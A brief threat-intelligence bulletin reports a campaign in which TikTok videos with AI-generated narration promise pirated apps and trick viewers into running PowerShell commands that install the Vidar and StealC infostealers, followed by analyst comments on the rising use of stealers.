TikTok Videos Lead to Infostealing Malware

In a new twist on an old tactic, threat actors are leveraging TikTok videos that promise access to pirated apps but instead lead to information-stealing malware. The videos are promoted using AI tools to trick victims into executing Powershell commands, thinking they are installing free, legitimate applications. The infostealers downloaded – Vidar and StealC – can capture clear text credentials, credit card info, and other user information. The use of information stealers has steadily increased in 2025, and the use of alternative stealers, including those observed in this campaign, will likely increase following Microsoft’s disruption of the prominent Lumma Stealer operation.
 

What’s Notable and Unique

• Social engineering tactics driven through social media are an attractive option for cybercriminals due to the sheer number of users and the ability to proliferate malicious content across that user base with relative ease.
• At least six TikTok accounts were identified as part of this campaign. These faceless accounts used AI-generated content to verbally instruct victims to run the malicious scripts on their devices.

 

Analyst Comments

Enticing victims into downloading malicious software with the promise of free applications, software, or content is not a new concept, nor is the use of social media to propagate malware. However, the combination of the most popular social media platform with AI-generated content is a powerful tool in the wrong hands. Coupled with the general increase in the use of information stealers to capture clear text credentials, this is a concerning trend in cybercriminal operations. Arete will continue monitoring the use of social media to propagate malware and other cybercriminal activity.
 

Sources

TikTok Videos Promise Pirated Apps, Deliver Vidar and StealC Infostealers Instead